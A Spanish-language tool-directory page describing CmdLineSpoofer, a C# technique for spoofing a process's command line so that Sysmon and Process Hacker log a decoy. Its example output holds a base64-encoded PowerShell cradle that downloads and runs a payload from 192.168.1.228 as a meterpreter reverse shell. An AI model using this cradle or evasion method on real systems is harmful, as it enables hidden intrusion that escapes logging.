Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CmdLineSpoofer — Cómo suplantar la línea de comandos al iniciar un nuevo proceso desde C#. | Kitploit
Herramientas/GitHubGitHub/plackyhacker/cmdlinespoofer
Escalada de PrivilegiosExplotaciónPost-ExplotaciónPruebas de PenetraciónComando y ControlAprendizaje y EducaciónRed TeamingDesarrollo de Payloads
GitHubplackyhacker/cmdlinespoofer

CmdLineSpoofer

Cómo suplantar la línea de comandos al iniciar un nuevo proceso desde C#.

Ver Repositorio
1121816hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Spoofer de Línea de Comandos

Un ejemplo de uso de C# para inyectar un shell meterpreter, mientras se falsifica la línea de comandos. La línea de comandos se almacena en el Bloque de Entorno del Proceso, se registra cuando se inicia un nuevo proceso y se muestra en herramientas como Process Hacker y Task Manager.

Introducción

Este código se basa en el blog How to Argue like Cobalt Strike de Adam Chester/XPN, el blog explica cómo Cobalt Strike falsifica la línea de comandos de un proceso al inyectar un beacon.

Usé esto como base para crear una versión en C# que genera un proceso de PowerShell e inyecta una shell reversa de meterpreter. Ciertamente no hay necesidad de un binario .Net para hacer esto, pero demuestra cómo se pueden falsificar comandos.

Se inicia un nuevo proceso en estado suspendido con un argumento de línea de comandos falsificado.

El comando falsificado se registra, pero podemos cambiar la línea de comandos en el PEB del proceso. Cuando se reanuda el hilo principal, el proceso utiliza la nueva línea de comandos en el PEB.

Ejemplo

La ejecución del código se muestra a continuación:

[+] Spoofing command: powershell.exe nothing to see here! :-P
[+] Process spawned, PID: 8588
[+] PEB Address: 0x2B2366F000
[+] ProcessParameters Address: 0x1EF61560000
[+] CommandLine Address: 0x1EF615606BC
[+] Original CommandLine: powershell.exe nothing to see here! :-P                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       
[+] New CommandLine: powershell.exe -exec bypass -enc WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACgASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMgAyADgALwBwAC4AZQB4AGUAIgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAuAEMAbwBuAHQAZQBuAHQAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAKAAsACAAWwBzAHQAcgBpAG4AZwBbAF0AXQAgACgAJwAxADkAMgAuADEANgA4AC4AMQAuADIAMgA4ACcALAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAUABJAEQALAAgACcAMQAwACcAKQApACkAOwB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADAAMAB9AA== , written to process
[+] Resuming process

Este ejemplo inyecta una shell reversa de meterpreter usando PowerShell, pero se registra con un argumento de línea de comandos falsificado.

Prueba de Concepto

Sysmon registra la línea de comandos original (falsificada):

Sysmon

Process Hacker no revela el comando ejecutado:

Process Hacker

Descargar herramienta